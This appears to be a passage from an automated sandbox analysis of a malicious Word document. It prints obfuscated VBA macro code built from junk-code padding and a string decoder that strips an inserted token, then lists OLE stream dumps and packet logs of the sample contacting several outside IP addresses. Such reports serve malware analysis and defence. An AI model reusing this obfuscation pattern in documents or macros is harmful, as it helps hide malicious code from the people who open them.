Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim pkixJADG As Object
Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
pkixJADG.WriteLine "wypNISsWSXthFJCq"
pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
Set ecGmY = OIbfvEEFF
pkixJADG.Close
Set DhnHIY = Nothing
Set EKmLA = eLmLDU
Set pkixJADG = Nothing
pkixJADG:
   GoTo KmGOADt
Dim CFdSBD As Object
Set nhLeJMLfI = FYVZFEH
Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim KmGOADt As Object
Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
KmGOADt.WriteLine "eXpjHFapHaPdRJu"
KmGOADt.WriteLine "eXObOTlBAITEOIo"
Set STzBjwICv = hoyzuBGCP
KmGOADt.Close
Set CFdSBD = Nothing
Set ORLICIl = lADFBaJ
Set KmGOADt = Nothing
KmGOADt:
End Function
Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
On Error Resume Next
   GoTo PbhYVsA
Dim PcHRGIADo As Object
Set TXmxvp = SQQWY
Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PbhYVsA As Object
Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
PbhYVsA.WriteLine "OyFBLhlWUnD"
PbhYVsA.WriteLine "TBKmUCEXTUIGu"
Set qHKYGHlFA = ddanFDWJf
PbhYVsA.Close
Set PcHRGIADo = Nothing
Set sPkIwu = RhztCF
Set PbhYVsA = Nothing
PbhYVsA:
Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
   GoTo NuebA
Dim sTzDC As Object
Set GIAKA = kwzjKvZHe
Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NuebA As Object
Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
NuebA.WriteLine "NeiIGCNWgICn"
NuebA.WriteLine "EgxfIDVQbJotWhj"
NuebA.WriteLine "UjBKOEDRIbiWFB"
Set idbaDIr = inIcjJtaF
NuebA.Close
Set sTzDC = Nothing
Set KXwaABT = zBSWCKmJv
Set NuebA = Nothing
NuebA:
Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
   GoTo gxBPJB
Dim zxgLHJSFW As Object
Set quDoH = KXTliE
Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gxBPJB As Object
Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
gxBPJB.WriteLine "WNFUDvHgghFdup"
gxBPJB.WriteLine "eeVVJBMGlcfXMB"
Set nleaHR = YZllAeRe
gxBPJB.Close
Set zxgLHJSFW = Nothing
Set mgTNFCq = hjZwD
Set gxBPJB = Nothing
gxBPJB:
Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
   GoTo mgrwfmN
Dim RjiQHRA As Object
Set EhCMG = FUyIHBDFz
Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim mgrwfmN As Object
Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
Set MNihxICY = AiRdGDAJ
mgrwfmN.Close
Set RjiQHRA = Nothing
Set wTMSLyWFG = AioOpBFE
Set mgrwfmN = Nothing
mgrwfmN:
End Function
Function Hrs2a1p95u19(Svk60sycz63sk)
Q491417n8n1 = Pg5minli2d3c9
   GoTo uWZkeMFv
Dim zDsRaIBGF As Object
Set ViWsSIH = sreXHFD
Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uWZkeMFv As Object
Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
uWZkeMFv.WriteLine "CcDmClHsnCC"
uWZkeMFv.WriteLine "aqGiHISIbAoabV"
uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
Set QOrvJEB = eCIzUDyJ
uWZkeMFv.Close
Set zDsRaIBGF = Nothing
Set UskmBJF = yJmmmVIAG
Set uWZkeMFv = Nothing
uWZkeMFv:
Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
   GoTo iHKuDmaEr
Dim OMZxxg As Object
Set drZcHkCm = uVItICICB
Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim iHKuDmaEr As Object
Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
iHKuDmaEr.WriteLine "syYTHJShrguhzb"
iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
iHKuDmaEr.WriteLine "oLweAMoGsqVE"
Set noebIvSiu = anyPG
iHKuDmaEr.Close
Set OMZxxg = Nothing
Set NXbmIuHX = YVZXECEHD
Set iHKuDmaEr = Nothing
iHKuDmaEr:
End Function
                                            VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                            General
                                            Stream Path:Macros/VBA/Zdjtk46nm17voo
                                            VBA File Name:Zdjtk46nm17voo
                                            Stream Size:701
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            Attribute VB_Name = "Zdjtk46nm17voo"

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.280929556603
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 492
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:492
                                            Entropy:3.85482742554
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 bc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6412
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6412
                                            Entropy:6.14518057053
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99192
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99192
                                            Entropy:7.3901039161
                                            Base64 Encoded:True
                                            Data ASCII:x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
                                            Data Raw:78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:524
                                            Entropy:5.52955915132
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                            Data Raw:49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:149
                                            Entropy:3.96410774314
                                            Base64 Encoded:False
                                            Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                            Data Raw:41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5216
                                            Entropy:5.49741129349
                                            Base64 Encoded:True
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:675
                                            Entropy:6.39671072877
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
                                            Data Raw:01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:21038
                                            Entropy:4.09747048154
                                            Base64 Encoded:True
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/06/21-08:45:13.475728ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                            01/06/21-08:45:14.495052ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:45:09.702562094 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.748287916 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.748416901 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.751085043 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.796603918 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806808949 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806837082 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806852102 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806866884 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806881905 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806934118 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.806983948 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.888216972 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.938440084 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.938561916 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.938826084 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.988883972 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997203112 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997236013 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997247934 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997263908 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997276068 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997348070 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:10.062748909 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.196155071 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:10.222618103 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.222837925 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.223018885 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.382577896 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383809090 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383841038 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383866072 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383888006 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383907080 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383919954 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383925915 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383943081 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383968115 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383970976 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383984089 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.389354944 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.551556110 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:12.532004118 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:12.797040939 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:12.797224045 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:12.797415972 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.062037945 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071660995 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071696997 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071721077 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071741104 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071764946 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071787119 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071789980 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071801901 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071815968 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071820021 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071822882 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071844101 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071857929 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071908951 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071943998 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336631060 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336663961 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336688995 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336709976 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336730003 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336751938 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336776018 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336786985 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336798906 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336813927 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336818933 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336834908 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336843014 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336854935 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336874008 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336877108 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336898088 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336918116 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336920023 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336940050 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336960077 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336960077 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336980104 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336997986 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337002039 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337021112 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337038040 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337044001 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337084055 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337424040 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602251053 CET8049168210.86.239.69192.168.2.22
